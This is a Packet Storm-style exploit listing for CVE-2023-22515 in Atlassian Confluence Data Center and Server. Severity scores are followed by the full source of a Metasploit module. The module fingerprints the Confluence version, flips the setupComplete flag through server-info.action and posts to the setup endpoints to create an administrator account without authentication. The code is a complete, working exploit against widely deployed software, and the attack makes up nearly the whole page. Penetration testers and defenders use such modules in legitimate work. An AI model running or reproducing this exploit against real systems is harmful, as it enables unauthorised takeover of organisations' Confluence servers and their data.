Lucene search

Unknown, Emir Polat, metasploit.comPACKETSTORM:177302

HistoryFeb 27, 2024 - 12:00 a.m.

Atlassian Confluence Data Center And Server Authentication Bypass

2024-02-2700:00:00

unknown, Emir Polat, metasploit.com

packetstormsecurity.com

atlassian

confluence

data center

server

authentication bypass

broken access control

cve-2023-22515

privilege escalation

vulnerability

remote

http

metasploit

exploit

rapid7

admin account

setup

complete

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7.4 High

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.973 High

EPSS

Percentile

99.9%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',  
'Description' => %q{  
This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.  
A specially crafted request can be create new admin account without authentication on the target Atlassian server.  
},  
'Author' => [  
'Unknown', # exploited in the wild  
'Emir Polat' # metasploit module  
],  
'References' => [  
['CVE', '2023-22515'],  
['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],  
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],  
['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']  
],  
'DisclosureDate' => '2023-10-04',  
'DefaultOptions' => {  
'RPORT' => 8090  
},  
'License' => MSF_LICENSE,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/']),  
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),  
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),  
OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])  
])  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/login.action')  
)  
return Exploit::CheckCode::Unknown unless res  
return Exploit::CheckCode::Safe unless res.code == 200  
  
poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text  
return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/  
  
confluence_version = Rex::Version.new(Regexp.last_match(1))  
  
vprint_status("Detected Confluence version: #{confluence_version}")  
  
if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||  
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||  
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))  
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")  
end  
  
Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")  
end  
  
def run  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/server-info.action'),  
'vars_get' => {  
'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'  
}  
)  
  
return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200  
  
print_good('Found server-info.action! Trying to ignore setup.')  
  
created_user = create_admin_user  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),  
'headers' => {  
'X-Atlassian-Token' => 'no-check'  
}  
)  
  
return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user  
  
print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200  
  
create_credential({  
workspace_id: myworkspace_id,  
origin_type: :service,  
module_fullname: fullname,  
username: datastore['NEW_USERNAME'],  
private_type: :password,  
private_data: datastore['NEW_PASSWORD'],  
service_name: 'Atlassian Confluence',  
address: datastore['RHOST'],  
port: datastore['RPORT'],  
protocol: 'tcp',  
status: Metasploit::Model::Login::Status::UNTRIED  
})  
  
print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")  
print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")  
end  
  
def create_admin_user  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),  
'headers' => {  
'X-Atlassian-Token' => 'no-check'  
},  
'vars_post' => {  
'username' => datastore['NEW_USERNAME'],  
'fullName' => 'New Admin',  
'email' => datastore['NEW_EMAIL'],  
'password' => datastore['NEW_PASSWORD'],  
'confirm' => datastore['NEW_PASSWORD'],  
'setup-next-button' => 'Next'  
}  
)  
res&.code == 302  
end  
end  
  
`